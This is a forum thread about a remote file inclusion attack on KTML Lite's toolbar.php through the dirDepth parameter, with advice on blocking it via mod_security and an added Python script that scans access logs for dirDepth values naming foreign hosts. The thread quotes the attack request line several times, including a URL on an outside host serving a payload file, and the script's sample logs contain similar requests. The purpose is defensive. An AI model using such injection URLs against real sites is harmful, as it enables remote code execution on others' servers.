Have any of you seen any solution to this problem:
The problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if you are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html
Could anybody help in finding ways around this security problem?
Regards Henri
toolbar.php and index.php dirDepth - hostile injection
Re: toolbar.php and index.php dirDepth - hostile injection
Hi Henri,
Haven't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens?
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definitely not include a file from a remote domain in that manner.
Coding mod_sec rules is not my forte so it will be best to ask your host for assistance.
Re: toolbar.php and index.php dirDepth - hostile injection
Thanks for your reply. I will delete the two files, and see if it has any effect.
Re: toolbar.php and index.php dirDepth - hostile injection
What two files do you want to delete?
Deleting toolbar.php will break the script.
What you need to do is check that no-one is calling an external script via the file.
/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt
In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
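The check described in the post above (a dirDepth value that names a host other than the site's own), as an added example that is not code from anyone in this thread. It scans access-log lines rather than blocking requests; the hostnames in SITE_HOSTS and the sample log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SITE_HOSTS = {"www.example.org", "example.org"}  # assumption: the site's own hostnames

# Constructed sample lines in combined log format (addresses and hosts are placeholders).
SAMPLE_LOG = '''\
203.0.113.7 - - [12/May/2010:10:01:02 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://files.example.net/x.txt? HTTP/1.1" 200 11213 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2010:10:02:10 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=../../ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2010:10:02:11 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://www.example.org/ktmlliterf/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [12/May/2010:10:05:40 +0200] "GET /ktmlliterf/includes/index.php?dirDepth=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)

def remote_dirdepth(target):
    """Return the foreign host named in dirDepth, or None if the value is local."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(("/toolbar.php", "/index.php")):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("dirDepth", []):
        value = unquote(value)  # parse_qs decoded once; decode again for double encoding
        if SCHEME_RE.match(value):
            host = (urlsplit(value.strip()).hostname or "").lower()
            if host not in SITE_HOSTS:
                return host or "(unparsed)"
    return None

def scan(log_text):
    """Return (client_ip, foreign_host, status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            host = remote_dirdepth(m.group(2))
            if host:
                hits.append((m.group(1), host, int(m.group(3))))
    return hits

if __name__ == "__main__":
    for ip, host, status in scan(SAMPLE_LOG):
        print(f"{ip} requested include from {host} (HTTP {status})")
```

The status code in each hit shows whether the server answered the request (200) or refused it (403), which helps decide which requests need follow-up.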
Re: toolbar.php and index.php dirDepth - hostile injection
Thanks for your help as it was what I experienced, so I will write the workaround as you have outlined. Thanks again
Fred wrote:
What two files do you want to delete?
Deleting toolbar.php will break the script.
What you need to do is check that no-one is calling an external script via the file.
/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt
In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Re: toolbar.php and index.php dirDepth - hostile injection
Glad you solved your problem.
Could you post the rule that you created?
It might be useful for someone else as well.